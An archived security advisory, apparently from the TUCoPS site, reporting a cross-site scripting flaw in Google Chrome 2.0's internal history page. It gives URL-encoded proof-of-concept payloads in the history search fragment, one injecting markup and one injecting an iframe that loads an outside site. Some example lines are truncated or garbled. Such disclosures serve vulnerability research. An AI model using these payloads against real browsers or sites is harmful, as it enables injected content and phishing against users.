TUCoPS :: Browsers :: bt-21355.htm

Google Chrome XSS
cross site scripting the browser google "chrome"
cross site scripting the browser google "chrome"



autor :         bikolinux
Vuln:		cross site scripting the browser google "chrome"
Download: http://www.google.com/chrome 
error           local
EMAIL MSG@BIKOLINUX.NET bikolinux@gmail.com 
vercion test  2.0.172.37
#######################################################################################
cross site scripting the browser google "chrome"
The error is when making a request to record
#######################################################################################
path = chrome://history/
path = view-source:chrome://history/

The error is in the form

EXAMPLE
chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E
view-source:chrome://history/#q=">

bikolinux

chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E -- bikolinux allowed

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH